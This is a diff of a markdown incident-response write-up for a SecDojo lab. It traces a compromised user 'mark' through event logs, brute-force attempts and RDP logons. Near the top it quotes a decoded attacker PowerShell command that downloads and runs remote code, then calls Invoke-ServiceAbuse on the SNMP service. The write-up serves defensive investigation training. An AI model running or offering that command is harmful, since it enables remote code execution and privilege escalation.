NinnessOtu/writeups/SECDOJO/Temple.md

         Decoded base64 part: `IEX (New-Object Net.Webclient).DownloadString('<http://127.0.0.1:38223/>'); Invoke-ServiceAbuse -Name 'SNMP'`

-These findings present us with another hypothesis to explore later, involving PowerShell event logs, which could potentially yield more artifacts.
+These findings give us another hypothesis to explore later: examining PowerShell event logs, which could reveal more artifacts.
 However, let's stay focused on our current goal.
 We should now examine the logon event associated with this particular **logonID** :

 ![Untitled](./pictures/6.png)

-We've come across a constraint in our ability to trace the subject user's logonID, as it pertains to the local system itself.
-However, this presents an opportunity rather than a setback.
-We can take note of this information and leverage it to construct more inquiries and hypotheses for our ongoing investigation.
+We've encountered a limitation in tracing the subject user's LogonID because it relates to the local system itself.
+However, this isn't a setback; it's an opportunity.
+We can use this information to develop further inquiries and hypotheses as we continue our investigation.

-Specifically, it seems that "mark" has instigated the suspicious activities we've identified.
-Consequently, we can proceed with the assumption that "mark" is the compromised user and proceed with a thorough examination of events leading up to this logon:
+Specifically, It appears that "mark" is responsible for the suspicious activities we've identified.
+Based on this, we can assume that "mark" is the compromised user.
+We'll now conduct a thorough examination of the events leading up to this logon:

 ![Untitled](./pictures/7.png)

-Upon filtering by **[user.name](http://user.name/):mark**, we observed a potential brute force pattern involving the "**mark**" user from the IP address **192.168.11.18**.
+Upon filtering by **user.name:mark**, we observed a potential brute force pattern involving **mark** user from the IP address **192.168.11.18**.
 Interestingly, this IP is the same one from which we identified that "**mark**" downloaded something using a PowerShell command.
-Notably, the brute force attempts culminated in a **successful login**.
+Notably, the brute force attempts eventually resulted in a **successful login**.

 Subsequently, we noted an **RDP** login from IP address **192.168.11.55**.